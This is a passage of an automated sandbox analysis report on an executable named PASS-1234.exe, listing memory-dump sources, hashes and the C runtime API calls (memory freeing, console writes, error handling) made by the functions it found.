                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: C:\Users\user\Desktop\PASS-1234.exe$};9m
                                                                                          • API String ID: 0-731360590
                                                                                          • Opcode ID: e310323ed42278b142b3ce94f77b87294d6ca90d77fb7c983740a941e725482c
                                                                                          • Instruction ID: 1ff7ab5741e40b24dbfd242fd4ce8fd124da7c6fa463977b2a7d8b1d2f456e5d
                                                                                          • Opcode Fuzzy Hash: e310323ed42278b142b3ce94f77b87294d6ca90d77fb7c983740a941e725482c
                                                                                          • Instruction Fuzzy Hash: 6921BEF1618206BF9B50AB688C80D6B77BDAF013687018615FA6D9F250F732DC4087A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 0-537541572
                                                                                          • Opcode ID: e6d81e6d8ceac1f36be60ddc1287c43ec5e84a906a119c48a198f5c5375521c8
                                                                                          • Instruction ID: 99476b738a296b4b8dabeae2ccabeea815aa31d4dc66fe49134c39c9eea30b57
                                                                                          • Opcode Fuzzy Hash: e6d81e6d8ceac1f36be60ddc1287c43ec5e84a906a119c48a198f5c5375521c8
                                                                                          • Instruction Fuzzy Hash: 8021AB35945216FBDB228A249C45B6A376CAB4B764B114210F935AF281F732D900C5F8
                                                                                          APIs
                                                                                            • Part of subcall function 6D3978FE: _free.LIBCMT ref: 6D397923
                                                                                          • _free.LIBCMT ref: 6D397984
                                                                                            • Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
                                                                                            • Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB
                                                                                          • _free.LIBCMT ref: 6D39798F
                                                                                          • _free.LIBCMT ref: 6D39799A
                                                                                          • _free.LIBCMT ref: 6D3979EE
                                                                                          • _free.LIBCMT ref: 6D3979F9
                                                                                          • _free.LIBCMT ref: 6D397A04
                                                                                          • _free.LIBCMT ref: 6D397A0F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                          • Instruction ID: 85ffb057c7b0ed0842c30d70d09c723d4ba4d52b3908634e66f663cfaa820c96
                                                                                          • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                          • Instruction Fuzzy Hash: EB1124B1948B04B6E520AB70CC06FCB779C9F09B05F558C19A3DE6E5A0EB69B506C790
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6D396A97
                                                                                          • __fassign.LIBCMT ref: 6D396C7C
                                                                                          • __fassign.LIBCMT ref: 6D396C99
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D396CE1
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D396D21
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D396DC9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                          • String ID:
                                                                                          • API String ID: 1735259414-0
                                                                                          • Opcode ID: 9bcaf38c5f1bfee8a98dc865b82916436ff61934ea349ed5a289ed78bcb88c2c
                                                                                          • Instruction ID: 7fbb1ad03dcc9ea23f99ea2e417a25e036f5248d5ed820804665f8c205d7d859
                                                                                          • Opcode Fuzzy Hash: 9bcaf38c5f1bfee8a98dc865b82916436ff61934ea349ed5a289ed78bcb88c2c
                                                                                          • Instruction Fuzzy Hash: 6EC1B375D052589FDF11CFA8C880AEDBBB9FF09314F14816AE965BB241E7319906CFA0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000001,?,6D3911C5,6D3902F0,6D38FD09,?,6D38FF41,?,00000001,?,?,00000001,?,6D39F120,0000000C,6D39003A), ref: 6D391505
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D391513
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D39152C
                                                                                          • SetLastError.KERNEL32(00000000,6D38FF41,?,00000001,?,?,00000001,?,6D39F120,0000000C,6D39003A,?,00000001,?), ref: 6D39157E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: ee96815d4567db597f1598c9f7cb6ca29d1cabb71b9639c7e0addbcee4f572e7
                                                                                          • Instruction ID: 6764e120e59463e7a9ab2a8d64dd55a6b3b2e3e6b157ebeec32a4e138548f949
                                                                                          • Opcode Fuzzy Hash: ee96815d4567db597f1598c9f7cb6ca29d1cabb71b9639c7e0addbcee4f572e7
                                                                                          • Instruction Fuzzy Hash: 4E01D83750C7176DEA1606789C86A762BBCDB0767D322033AF265BD1E0FF1348416540
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6D391734,00000000,?,00000001,00000000,?,6D3917AB,00000001,FlsFree,6D39AD3C,FlsFree,00000000), ref: 6D391703
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3664257935-2084034818
                                                                                          • Opcode ID: da42f23fc2130ed0175db5eb529a588f2337973f3c2a1ff284a8d729954366c9
                                                                                          • Instruction ID: 834657c50f7c09c416c82faa638f44fdc9f8c83960d2f36bb44a3e5df346e943
                                                                                          • Opcode Fuzzy Hash: da42f23fc2130ed0175db5eb529a588f2337973f3c2a1ff284a8d729954366c9
                                                                                          • Instruction Fuzzy Hash: DA113332E45626ABDB228B688C45B5D77BCAF02764F190251ED15FF280F772ED008AE5
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D391CDC,?,?,6D391CA4,?,00000001,?), ref: 6D391D3F
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D391D52
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,6D391CDC,?,?,6D391CA4,?,00000001,?), ref: 6D391D75
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 8cc9662c10f96da8a15ed0bd850170575862577527ce2b72bd9cbe98f03cb728
                                                                                          • Instruction ID: bc18f292104e18b5257207caf02cf4de1cd0502fe54a7ddc3b8d8cb2124157ed
                                                                                          • Opcode Fuzzy Hash: 8cc9662c10f96da8a15ed0bd850170575862577527ce2b72bd9cbe98f03cb728
                                                                                          • Instruction Fuzzy Hash: 8FF01C31D01519FBDF11AB91CD0AFAE7ABDEB41756F100164E411BA250EB368E00DB90
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 6D3963CB
                                                                                          • __alloca_probe_16.LIBCMT ref: 6D396491
                                                                                          • __freea.LIBCMT ref: 6D3964FD
                                                                                            • Part of subcall function 6D3954FC: HeapAlloc.KERNEL32(00000000,3R9m,6D395233,?,6D393F33,00000220,?,6D395233,?,?,?,?,6D397351,00000001,?,?), ref: 6D39552E
                                                                                          • __freea.LIBCMT ref: 6D396506
                                                                                          • __freea.LIBCMT ref: 6D396529
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1096550386-0
                                                                                          • Opcode ID: 31823802340b070b4716f77624472a4c4482c3ed44ea15ec1e0477f72f3f9f20
                                                                                          • Instruction ID: c0b077ae89d7ce7eb53dbe376c0f8fb69ae79de9d72e29abac2e352e95d8fd5a
                                                                                          • Opcode Fuzzy Hash: 31823802340b070b4716f77624472a4c4482c3ed44ea15ec1e0477f72f3f9f20
                                                                                          • Instruction Fuzzy Hash: 48518272505217AFEB118EA48C81EBF3AA9EF45664F128129FE18AF150F736DC5186E0
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 6D3978AD
                                                                                            • Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
                                                                                            • Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB
                                                                                          • _free.LIBCMT ref: 6D3978BF
                                                                                          • _free.LIBCMT ref: 6D3978D1
                                                                                          • _free.LIBCMT ref: 6D3978E3
                                                                                          • _free.LIBCMT ref: 6D3978F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 8530465f19b6bc310d92d9edc67c668dc73b557a59368ef40eb4e6da03580208
                                                                                          • Instruction ID: 6f0eed2b683fe23e506ec7119ce0c769db79a03258197d02d51f7045011ff45b
                                                                                          • Opcode Fuzzy Hash: 8530465f19b6bc310d92d9edc67c668dc73b557a59368ef40eb4e6da03580208
                                                                                          • Instruction Fuzzy Hash: F0F044B190C306A7CB11DA65D486D2737EEEE013117554C0AF1A9DF580E775F881C6D4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: *?
                                                                                          • API String ID: 269201875-2564092906
                                                                                          • Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                                          • Instruction ID: e12048273d6fd40b29667b130cf615e71829ff7d1d58b98d077e669bb807ec31
                                                                                          • Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                                          • Instruction Fuzzy Hash: B3617CB5D0421A9FCB15CFA9C8815EEFBF5EF48314B15816AD959EB300E731AE41CB90
                                                                                          APIs
                                                                                            • Part of subcall function 6D396A4F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6D396A97
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6D395233,?,00000000,00000000,6D39F360,0000002C,6D3952A4,?), ref: 6D397402
                                                                                          • GetLastError.KERNEL32 ref: 6D39740C
                                                                                          • __dosmaperr.LIBCMT ref: 6D39744B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                          • String ID: 3R9m
                                                                                          • API String ID: 910155933-2439373522
                                                                                          • Opcode ID: 12b1adbc5dab4cfb4afa4ad75c78e4037deedc67d1aeea96cc42107fa07fae4a
                                                                                          • Instruction ID: 1041dcdfb19cea7d7418e2e7e5059ab4208663f35bb7e5b2b439a240ecfe6e51
                                                                                          • Opcode Fuzzy Hash: 12b1adbc5dab4cfb4afa4ad75c78e4037deedc67d1aeea96cc42107fa07fae4a
                                                                                          • Instruction Fuzzy Hash: 0B51D6F1E1410AABDB028FA8C842FEE7FB8AF46314F154055EA54AF1D1F7729941CBA0
                                                                                          APIs
                                                                                            • Part of subcall function 6D3938A9: _free.LIBCMT ref: 6D3938B7
                                                                                            • Part of subcall function 6D39447D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6D3964F3,?,00000000,00000000), ref: 6D394529
                                                                                          • GetLastError.KERNEL32 ref: 6D3932EF
                                                                                          • __dosmaperr.LIBCMT ref: 6D3932F6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D393335
                                                                                          • __dosmaperr.LIBCMT ref: 6D39333C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                          • String ID:
                                                                                          • API String ID: 167067550-0
                                                                                          • Opcode ID: 55a141dfa2e517a5e154993d6b9770a1209c4a902192e1697aba8bab13038817
                                                                                          • Instruction ID: 1d6b5f1b286697efb9bbe24f3723898faee2776509820cec9ef27c2a36a85d3f
                                                                                          • Opcode Fuzzy Hash: 55a141dfa2e517a5e154993d6b9770a1209c4a902192e1697aba8bab13038817
                                                                                          • Instruction Fuzzy Hash: 0B2165F1648206AF9B115FA5CC81D6B77ACEF053687058514E6ADDF650FB32EC0087A0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,6D396E97,?,00000001,6D3952A4,?,6D397351,00000001,?,?,?,6D395233,?,00000000), ref: 6D392B8C
                                                                                          • _free.LIBCMT ref: 6D392BE9
                                                                                          • _free.LIBCMT ref: 6D392C1F
                                                                                          • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6D397351,00000001,?,?,?,6D395233,?,00000000,00000000,6D39F360,0000002C,6D3952A4), ref: 6D392C2A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_free
                                                                                          • String ID:
                                                                                          • API String ID: 2283115069-0
                                                                                          • Opcode ID: 949f78bacf387d37893675666281bde7e323133b032fc4a6ec8671023c2aa134
                                                                                          • Instruction ID: b87e38c9f670a3ca7cadf5001ead26f7e82fd99873ba310481b678edbcb29b9b
                                                                                          • Opcode Fuzzy Hash: 949f78bacf387d37893675666281bde7e323133b032fc4a6ec8671023c2aa134
                                                                                          • Instruction Fuzzy Hash: 8E11A77A20DE063EDB2216785D81E2B26ADABC626C7664735F7349E2D0FF6388054614
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00000001,6D393118,6D3931A9,?,?,6D3923BC), ref: 6D392CE3
                                                                                          • _free.LIBCMT ref: 6D392D40
                                                                                          • _free.LIBCMT ref: 6D392D76
                                                                                          • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6D393118,6D3931A9,?,?,6D3923BC), ref: 6D392D81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast_free
                                                                                          • String ID:
                                                                                          • API String ID: 2283115069-0
                                                                                          • Opcode ID: 503276cdf07d302b5b9899fd08790c0af04dc3eedd6def1cf6bd6977a983a17f
                                                                                          • Instruction ID: 1153f595c050e237e1062bc6162ee0105a4e6ee9464f6d8e6f671269bd2629ae
                                                                                          • Opcode Fuzzy Hash: 503276cdf07d302b5b9899fd08790c0af04dc3eedd6def1cf6bd6977a983a17f
                                                                                          • Instruction Fuzzy Hash: E3110C7A20FE023ADB2216785D81E2B266DEBC62BD7654335F734CE2E0FF2398004164
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001), ref: 6D3980FD
                                                                                          • GetLastError.KERNEL32(?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001,?,00000001,?,6D397372,3R9m), ref: 6D398109
                                                                                            • Part of subcall function 6D3980CF: CloseHandle.KERNEL32(FFFFFFFE,6D398119,?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001,?,00000001), ref: 6D3980DF
                                                                                          • ___initconout.LIBCMT ref: 6D398119
                                                                                            • Part of subcall function 6D398091: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D3980C0,6D397B2D,00000001,?,6D396E26,?,?,00000001,?), ref: 6D3980A4
                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6D397B40,?,00000001,?,00000001,?,6D396E26,?,?,00000001,?), ref: 6D39812E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 1d64c58f7b6f1014034e5d9a2431ae9275877d3a0f714f1be7e20a039d6cc3c3
                                                                                          • Instruction ID: af85988763d81967e21e6a8e16194549c208e71fdcf9b42343988b0110124d7b
                                                                                          • Opcode Fuzzy Hash: 1d64c58f7b6f1014034e5d9a2431ae9275877d3a0f714f1be7e20a039d6cc3c3
                                                                                          • Instruction Fuzzy Hash: 41F0AC36505129BBCF221F95CC08E993F7AEF493A1F054111FB5899220EB338820EB95
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 6D3924BD
                                                                                            • Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
                                                                                            • Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB
                                                                                          • _free.LIBCMT ref: 6D3924D0
                                                                                          • _free.LIBCMT ref: 6D3924E1
                                                                                          • _free.LIBCMT ref: 6D3924F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 34a0a290588ad8fdadd214281cf2d12cfcceb1b571f77d35c739bf618344111f
                                                                                          • Instruction ID: 2ec04cb1c270fe9bd97bebf97b05e4d8f12d6c523c823cba9b1d5f5858b33095
                                                                                          • Opcode Fuzzy Hash: 34a0a290588ad8fdadd214281cf2d12cfcceb1b571f77d35c739bf618344111f
                                                                                          • Instruction Fuzzy Hash: 06E0BFB5415120BBCE316F19E40068E3E79F74B60434E950BF555562A1D7390552DF89
                                                                                          APIs
                                                                                            • Part of subcall function 6D393CA0: GetOEMCP.KERNEL32(00000000,6D393F11,?,00000001,6D397351,6D397351,00000001,?,?), ref: 6D393CCB
                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6D393F58,?,00000000,?,6D395233,?,?,?,?,6D397351), ref: 6D394163
                                                                                          • GetCPInfo.KERNEL32(00000000,?,?,?,6D393F58,?,00000000,?,6D395233,?,?,?,?,6D397351,00000001,?), ref: 6D3941A5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
